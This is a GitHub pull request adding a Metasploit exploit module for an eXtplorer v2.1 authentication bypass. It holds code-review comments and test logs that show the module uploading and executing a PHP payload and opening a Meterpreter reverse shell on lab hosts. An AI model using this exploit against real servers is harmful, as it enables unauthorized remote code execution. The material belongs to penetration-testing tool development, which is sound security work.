Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add eXtplorer v2.1 auth bypass exploit module #1221

Merged
merged 1 commit into from Jan 9, 2013

Conversation

bcoles
Copy link
Contributor

@bcoles bcoles commented Dec 30, 2012

Add eXtplorer v2.1 authentication bypass vulnerability exploit module

eXtplorer v2.1 authentication bypass vulnerability exploit

})

return Exploit::CheckCode::Vulnerable if res and res.code == 200 and res.body =~ /<version>2\.1\.(0RC5|0|1|2)<\/version>/
return Exploit::CheckCode::Detected if res and res.code == 200 and res.body =~ /eXtplorer/
Copy link
Contributor

@brandonprry brandonprry Dec 30, 2012

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Seems like you could move the "if res and res.code == 200" into a parent if statement, and make these lines a bit shorter, then use an else for the safe check code.

@brandonprry
Copy link
Contributor

@brandonprry brandonprry commented Dec 30, 2012

I cannot reproduce this and I have a tried a few different tarballs. Can you paste me the md5 or, better yet, email the md5 and archive you used to brandon_perry@rapid7.com

@brandonprry
Copy link
Contributor

@brandonprry brandonprry commented Dec 30, 2012

My Target URI was wrong.

msf exploit(extplorer_upload_exec) > set TARGETURI /
TARGETURI => /
msf exploit(extplorer_upload_exec) > exploit

[] Started reverse handler on 192.168.1.31:4444
[
] 192.168.1.58:80 - Authenticating as user (admin)
[] 192.168.1.58:80 - Authenticated successfully
[
] 192.168.1.58:80 - Retrieving writable subdirectories
[] 192.168.1.58:80 - Successfully retrieved writable subdirectory (ftp_tmp)
[
] 192.168.1.58:80 - Uploading PHP payload (1785 bytes) to /ftp_tmp
[+] 192.168.1.58:80 - File uploaded successfully
[] 192.168.1.58:80 - Searching directories for file (QtuNy3LIlEmmd.php)
[+] 192.168.1.58:80 - Successfully found file
[
] 192.168.1.58:80 - Executing payload (/ftp_tmp/QtuNy3LIlEmmd.php)
[] Sending stage (39217 bytes) to 192.168.1.58
[
] Meterpreter session 1 opened (192.168.1.31:4444 -> 192.168.1.58:54293) at 2012-12-30 11:43:03 -0600

getuid

meterpreter >
meterpreter > getuid
Server username: www-data (33)
meterpreter >

},
'DefaultOptions' =>
{
'ExitFunction' => "none"
Copy link
Contributor

@wchen-r7 wchen-r7 Dec 30, 2012

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

you probably don't even need DefaultOptions at all.

@jvazquez-r7
Copy link
Contributor

@jvazquez-r7 jvazquez-r7 commented Jan 9, 2013

Did cleanup by myself and retested:

msf  exploit(extplorer_upload_exec) > check
[+] The target is vulnerable.
msf  exploit(extplorer_upload_exec) > rexploit
[*] Reloading module...
[*] Started reverse handler on 192.168.1.128:4444 
[*] 192.168.1.138:80 - Authenticating as user (admin)
[*] 192.168.1.138:80 - Authenticated successfully
[*] 192.168.1.138:80 - Retrieving writable subdirectories
[*] 192.168.1.138:80 - Successfully retrieved writable subdirectory (config)
[*] 192.168.1.138:80 - Uploading PHP payload (1316 bytes) to /eXtplorer/config
[+] 192.168.1.138:80 - File uploaded successfully
[*] 192.168.1.138:80 - Searching directories for file (l3xVr4qUooRD.php)
[+] 192.168.1.138:80 - Successfully found file
[*] 192.168.1.138:80 - Executing payload (/eXtplorer/config/l3xVr4qUooRD.php)
[*] Sending stage (39217 bytes) to 192.168.1.138
[*] Meterpreter session 5 opened (192.168.1.128:4444 -> 192.168.1.138:41454) at 2013-01-09 19:43:18 +0100
^C[-] Exploit failed: Interrupt 
meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : ubuntu
OS          : Linux ubuntu 2.6.32-38-generic #83-Ubuntu SMP Wed Jan 4 11:13:04 UTC 2012 i686
Meterpreter : php/php
meterpreter > 

merging!

@jvazquez-r7 jvazquez-r7 merged commit 8e543cf into rapid7:master Jan 9, 2013
1 check passed
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

Successfully merging this pull request may close these issues.

None yet

4 participants